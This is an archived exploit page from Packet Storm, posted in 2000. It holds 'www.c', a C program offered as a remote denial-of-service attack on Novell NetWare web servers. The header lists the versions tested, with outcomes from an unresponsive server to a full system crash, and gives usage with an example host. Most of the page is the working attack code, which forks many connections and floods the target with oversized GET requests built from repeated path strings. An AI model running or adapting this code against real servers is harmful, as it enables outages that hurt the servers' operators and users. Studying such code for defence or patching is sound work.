what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

www.c

www.c
Posted Apr 3, 2000
Authored by Venglin | Site b0f.freebsd.lublin.pl

Novell NetWare webservers remote denial of service - Tested on Novell NetWare 4.11 with Novell-HTTP-Server/3.1R1, Novell NetWare 4.1 with Novell-HTTP-Server/2.51R1, Novell NetWare ?.? with YAWN/1.05.

tags | remote, web, denial of service
SHA-256 | 82e29ba646ae0fed257d1d55f00ab7948089713cf990959663a0e8bc3f3537f7

www.c

Change Mirror Download
/******************************************************************************
Novell NetWare webservers remote denial of service
<venglin@freebsd.lublin.pl>
( buffer0verfl0w security - b0f.morphed.net )
*******************************************************************************
Tested on:

- Novell NetWare 4.11 with Novell-HTTP-Server/3.1R1:
Webserver stops responding requests for few minutes.

- Novell NetWare 4.1 with Novell-HTTP-Server/2.51R1:
Whole system crash [page fault?].

- Novell NetWare ?.? with YAWN/1.05 (crc:E8B0):
Webserver crash.

- Novell NetWare 3.12 with YAWN/1.05 (crc:E8B0):
No problems.

- Novell NetWare 4.11 with YAWN/1.05 (crc:E8B0):
No problems.

*******************************************************************************
Usage:

./www <vulnerable_host> <http_port> <how_many_connections> <string_length>

Example:

./www copernicus.9lo.lublin.pl 80 10 10000
******************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/wait.h>

#define GET "GET"
#define PAT1 "/"
#define PAT2 "a/"
#define PAT3 "../"
#define PAT4 "./"

long getip(char *name)
{
struct hostent *hp;
long ip;

if ((ip=inet_addr(name))==-1)
{
if ((hp=gethostbyname(name))==NULL)
{
(void)fprintf(stderr, "gethostbyname failed.\n");
exit(1);
}
memcpy(&ip, (hp->h_addr), 4);
}
return ip;
}

int main (argc, argv)
int argc;
char **argv;
{
struct sockaddr_in cli;
int sockfd, i, x, len;
char *msg1, *msg2, *msg3, *msg4;

if (argc < 5) { (void)fprintf(stderr, "usage: %s <host> <port> <connections> <len>\n", argv[0]); exit(0); }

bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_addr.s_addr=getip(argv[1]);
cli.sin_port = htons(atoi(argv[2]));

len = atoi(argv[4]);
if (len < (sizeof(GET)+1+sizeof(PAT1))) { (void)fprintf(stderr, "len too small.\n"); exit(1); }
msg1 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg2 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg3 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg4 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);

sprintf(msg1, "%s %s", GET, PAT1);
sprintf(msg2, "%s %s", GET, PAT1);
sprintf(msg3, "%s %s", GET, PAT1);
sprintf(msg4, "%s %s", GET, PAT1);

for(i=0;i<(len/sizeof(PAT1));i++) strcat(msg1, PAT1);
for(i=0;i<(len/sizeof(PAT2));i++) strcat(msg2, PAT2);
for(i=0;i<(len/sizeof(PAT3));i++) strcat(msg3, PAT3);
for(i=0;i<(len/sizeof(PAT4));i++) strcat(msg4, PAT4);

for(i=0;i<(atoi(argv[3]));i++) if (!(x=fork()))
{
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg1, strlen(msg1));
close(sockfd);
free(msg1);

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg2, strlen(msg2));
close(sockfd);
free(msg2);

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg3, strlen(msg3));
close(sockfd);
free(msg3);

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg4, strlen(msg4));
close(sockfd);
free(msg4);

exit(0);
}

waitpid(x,&i,0);

exit(0);
}
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close